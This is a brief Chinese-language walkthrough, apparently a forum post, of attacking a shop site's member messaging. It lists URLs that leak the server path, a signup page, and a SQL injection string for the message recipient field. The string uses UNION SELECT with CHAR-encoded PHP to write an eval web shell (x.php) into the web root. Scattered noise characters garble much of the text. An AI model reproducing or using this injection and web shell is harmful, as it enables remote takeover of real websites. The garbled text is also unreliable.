第一个:想办法找到目标网站的绝对路径
$ ? }+ s% W( s1 o9 A$ U9 u2 _# ?% z" v" M- N- h
http://www.political-security.com/install/svinfo.php?phpinfo=true
$ E" I$ ^3 M* r9 t9 v1 N
$ \1 p7 o1 q* qhttp:/www.political-security.com/core/api/shop_api.php
% a q. ?; R+ Y' R& I
4 b/ p: d+ }1 T0 f3 |1 u5 Xhttp://www.political-security.co ... api_b2b_2_0_cat.php3 h1 i1 ?; K; v! c7 ^0 D7 _) D* |. J) v
) S% A# X! K4 F5 y0 f) A/ }" I
http://www.political-security.com/core/ap ... b_2_0_goodstype.php @7 |" f5 q. M u
G7 W( d" t. ^6 ^; i
http://www.political-security.co ... i_b2b_2_0_brand.php
4 j7 |) n' y1 s9 e' H第二个:注册一个普通用户# h( y( _7 V& }# ]; z1 j- D! b
6 P7 ]) t1 j% ~" l3 F' g. {! `
http://www.political-security.com/?passport-signup.html& @" _9 z. e; _1 Q1 D/ c6 X
2 N7 t# j/ L) a+ w" T* H" T
第三个: 发送消息
! G( Q- F3 \( C% w7 ^
! I, J' a M# _+ N- I+ B. K" Ehttp://www.political-security.com/?member-send.html
- J% t S9 A. C' S发送给中填写1 d2 {$ C# a% v- z) K
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |